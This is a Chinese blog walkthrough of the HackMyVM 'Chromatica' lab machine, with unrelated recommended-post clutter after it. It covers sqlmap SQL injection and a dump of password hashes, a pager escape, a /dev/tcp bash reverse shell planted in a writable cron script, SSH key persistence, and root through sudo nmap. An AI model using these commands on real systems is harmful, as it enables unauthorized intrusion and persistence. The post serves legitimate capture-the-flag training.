Chromatica - hackmyvm

已于 2024-05-15 22:44:03 修改
阅读量373 收藏 4
点赞数 7
分类专栏: hackmyvm靶场合集 文章标签: 安全 网络安全 linux 服务器 网络
于 2024-05-15 22:42:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/138926276
版权

简介

靶机名称:Chromatica

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Chromatica

本地环境

虚拟机:vitual box

靶场IP(Chromatica):192.168.56.115

跳板机IP(windows 11):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

nmap起手,来了个5353端口

nmap -p 1-65535 -T4 -A -v 192.168.56.115/32

image-20240515185634358

http

gobuster扫描目录

gobuster dir  -u http://192.168.56.115/ -w $HVV_PATH/8_dict/SecLists-master/Discovery/Web-Content/directory-list-2.3-big.txt -b 402-404   -t 10 -x php,zip,bak,jpg,txt,html

image-20240515195927821

/robots.txt路径下找到新路径

image-20240515205952319

sql注入

将User-Agent改为dev再访问该路径即可得到一个搜索界面

image-20240515210148778

后面搜索没什么结果,随便塞个万能密码发现是sql注入

image-20240515210408762

sqlmap一把梭,不过需要注意指定user-agent
sqlmap -u http://192.168.56.115/dev-portal/search.php\?city\= --method GET --user-agent="dev" -D Chromatica --dump-all
image-20240515211235783

+----+----------------------------------+-----------+-----------------------------+
| id | password                         | username  | description                 |
+----+----------------------------------+-----------+-----------------------------+
| 1  | 8d06f5ae0a469178b28bbd34d1da6ef3 | admin     | admin                       |
| 2  | 1ea6762d9b86b5676052d1ebd5f649d7 | dev       | developer account for taz   |
| 3  | 3dd0f70a06e2900693fc4b684484ac85 | user      | user account for testing    |
| 4  | f220c85e3ff19d043def2578888fb4e5 | dev-selim | developer account for selim |
| 5  | aaf7fb4d4bffb8c8002978a9c9c6ddc9 | intern    | intern                      |
+----+----------------------------------+-----------+-----------------------------+

这里理应爆破,但我的kali本爆不出来,其他几个字典也都半斤八两,所以还是cmd5付费消灾吧()

image-20240515212643919

❯ ssh dev@192.168.56.115
dev@192.168.56.115's password:
GREETINGS,
THIS ACCOUNT IS NOT A LOGIN ACCOUNT
IF YOU WANNA DO SOME MAINTENANCE ON THIS ACCOUNT YOU HAVE TO
EITHER CONTACT YOUR ADMIN
OR THINK OUTSIDE THE BOX
BE LAZY AND CONTACT YOUR ADMIN
OR MAYBE YOU SHOULD USE YOUR HEAD MORE heh,,
REGARDS

brightctf{ALM0ST_TH3R3_34897ffdf69}
Connection to 192.168.56.115 closed.

得到假flag一枚(汗)

既然是我们是成功连接上的,有什么办法能让这连接保留下来?

首先把窗口缩小到无法一次性打印全部字符

img

然后在这时直接输入!bash

img

over

目录下的user.txt内容为brightctf{ONE_OCKLOCK_8cfa57b4168}

提权

定时任务利用

查看crontab

dev@Chromatica:/home$ cat /etc/crontab

SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   analyst /bin/bash /opt/scripts/end_of_day.sh

发现会每分钟执行一次脚本,而且我们还有写入权限

dev@Chromatica:/opt/scripts$ ls -alh
total 12K
drwxrwxrwx 2 root    root    4.0K Apr 18 07:57 .
drwxr-xr-x 6 root    root    4.0K Apr 24 14:05 ..
-rwxrwxrw- 1 analyst analyst   30 May 15 14:00 end_of_day.sh

那没什么好说的了,攻击机起监听,shell脚本写上去

监听命令

rlwrap -cAr nc -lvvp 40001

反弹命令

bash -c "bash -i >& /dev/tcp/192.168.56.1/40001 0>&1"

image-20240515222809901

ssh持久化

把我们攻击机的公钥写到 authorized_keys

analyst@Chromatica:~$ ssh-keygen
...
analyst@Chromatica:~$ cd .ssh
analyst@Chromatica:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClvG6svC2GWmvvZyP2dF1aWWsyDEfwoSCkaleG/VK38Dpzu4agS5FGrkZa2bnebp8LB1mdwEyUr8eq1RcApIDn8jhVaShDNj9EffzzCQWWnJ/1pEXJqmhgjkUvW5LngLTyrsAL2y4ko/zSNY4mebJxnfDc/COjl4u5Rh3PoV0GktC3b+9q4b3InVYjfTVrX77zi30zFhrmYT+0xpjfc1PUFmAqXiLx/zfDBTBAgOTrRZ098XZA63YsLV1YCQxc9iyIjyqJUjXD5lq70oMbub264BREBTFILmdLJQjVwctr/NdDn9TIeFLNBDXZzCGkpqCBUG4+VaqXL/gpQUCb/cJj0UMJBmRXfS0ltt1cWUlYkUb34hlSSrnbtdFkZYfkoZnrrQvJw86pMSO5HJah7XnZUlXQ7w47tloh/u6EW+zo0Q96wQ+SvHRE+XnhgKjQhpmcGWkU0Kw9u34MKS8T3g1uptopuHpa/XhBLah7poRtAtJsDDbVjcxlIW6XS2HT61s= root@koishi-reverse" >> authorized_keys

image-20240515223129420

sudo -l提权

sudo -l查看权限

analyst@Chromatica:~$ sudo -l
Matching Defaults entries for analyst on Chromatica:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User analyst may run the following commands on Chromatica:
    (ALL : ALL) NOPASSWD: /usr/bin/nmap

直接上gtfobins找弹shell命令

image-20240515223616088

执行成功弹到shell。不过输入的部分不知道重定向哪里去了怎样都看不到,反正盲打个cat /root/root.txt就通关了

image-20240515223607639
brightctf{ALM0ST_TH3R3_34897ffdf69}

古明地核
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HackMyVM-Chromatica
分享
05-16 240
HackMyVM-Chromatica。。。。好玩!
【Java】--线程
weixin_45023089的博客
06-23 110
概念: 进程是指一个内存中运行的应用程序,每个进程都有自己独立的一块内存空间,一个进程中可以启动多个线程。 系统资源分配和调度的独立单位,相互之间不能共享资源,由操作系统 线程是指进程中的一个执行流程,一个进程中可以运行多个线程。比如java.exe进程中可以运行很多线程。线程总是属于某个进程,进程中的多个线程共享进程的内存。 依靠程序执行的顺序控制流,只能使用程序的资源和环境,共享进程的全部资源...
【Java】--Thread类
weixin_45023089的博客
06-23 140
Thread类实现了Runnable接口,在Thread类中,有一些比较关键的属性,比如name是表示Thread的字,可以通过Thread类的构造器中的参数来指定线程名字,priority表示线程的优先级(最大值为10,最小值为1,默认值为5),daemon表示线程是否是守护线程,target表示要执行的任务。以下是一些常用的方法: 1) start方法   start()用来启动一个线程,当调...
【Java】----泛型
weixin_45023089的博客
06-21 92
Apple和Orange都放在了容器里,将它们取出后都发生了运行时异常,因为这个示例没有使用泛型。 Apple和Orange类是不一样的,它们除了都是Object之外没有其他的共性。(如果一个类没有显示地声明继承哪个类,那么它自动继承Object)。因为ArrayList保存的是Object,因此可以通过ArrayList的add()方法将Apple对象放进容器中,Orange对象也可以添加。但当...
【Java】--实现Runnable接口
weixin_45023089的博客
06-23 652
多线程的实现方式主要有两种: 1.继承Thread类: 通过继承Thread类,重写Thread的run()方法,将线程运行的逻辑放在其中 2.实现Runnable接口:通过实现Runnable接口,实例化Thread类。 这两种方法有一定的差异。 Runnable接口中只有一个run()方法,它非Thread类子类的类提供的一种激活方式。一个类实现Runnable接口后,并不代表该类是一个“线程...
【Java】--流的概念
weixin_45023089的博客
06-18 223
流机制是java中一个重要的机制,通过流能自由的控制文件,内存,IO,等等中的数据的流向。 流是一串不连续的数据的集合, Java将数据从源(文件、内存、键盘、网络)读入到内存中,形成了流,然后将这些流还可以写到另外的目的地(文件、内存、控制台、网络),之所以称为流,是因为这个数据序列在不同时刻所操作的是源的不同部分。 流的分类 1、按照输入的方向分,输入流和输出流,输入输出的参照对象是Java程...
【Java】----剑指Offer链表
weixin_45023089的博客
06-06 82
题目:输入一个链表,输出该链表中倒数第k个结点 public class ListNode { int val; ListNode next = null; ListNode(int val) { this.val = val; } } public class Solutio...
【java】----输出不重复且降序
weixin_45023089的博客
06-10 704
**题目:**List中存放若干学生对象(学生有学号,姓名,性别等属性),去除List中重复的元素,并按学号降序输出。(请百度并利用LinkedHashSet集合,既不会重复,同时有可预测的顺序即输入顺序) import java.util.Objects; public class Student implements Comparable<Student> { publ...
【java】动态规划----查找最长公共子列
weixin_45023089的博客
05-20 325
**例题:**给定两个序列,例如 X = “ABCBDAB”、Y = “BDCABA”,求它们的最长公共子序列的长度。 子序列:在给定的这两个母序列中,比如序列BCAB在母串ABCBDAB与BDCABA中都出现过并且出现顺序与母串保持一致,我们将其称为公共子序列。最长公共子序列(Longest Common Subsequence,LCS),顾名思义,是指在所有的子序列中最长的那一个。在上述例子的...
Chromatica
03-18
色度 Denis Andreyuk,853501 实验室№2(HTML) 实验室№3(CSS) 实验室№? (JS)
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 325
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 961
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 709
安全漏洞扫描工具
操作系统安全:Windows系统安全配置,Windows安全基线检查加固
wangyuxiang946的博客
06-11 1317
Windows安全基线检查标准,Windows加固方式
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 932
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
安鸾学院靶场——安全基础
qq_55202378的博客
06-13 1029
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 526
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
Veeam Backup Enterprise Manager身份验证绕过漏洞(CVE-2024-29849)
lujiawei00的专栏
06-11 512
对于无法立即将 Veeam Backup Enterprise Manager 升级到 12.1.2.172 的客户,可执行以下缓解措施: 1.通过停止 Veeam Backup Enterprise Manager 软件来缓解该漏洞,可停止并禁用以下服务(禁用服务不会阻止安装 12.1.2 更新,但更新后需要将服务重置回自动启动):
Linux网络安全
十一、的博客
06-09 880
由于Linux系统的安全稳定,所以经常被用作网络应用服务器。但由于程序代码缺陷的难以避免,这些安装在Linux系统上的网络程序往往会存在着各种漏洞,而入侵者则是利用这些漏洞进行网络攻击,进入系统窃取数据、破坏系统或使系统无法提供正常服务等。Ping是基于ICMP协议的一个实用程序,用于验证两台计算机之间网络连接的可达性和质量。它通过发送ICMP回声请求消息到目标主机,并等待回声应答消息来判断网络状态。当执行ping命令时,它会生成一个ICMP回声请求数据包并发送到指定的目标主机。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值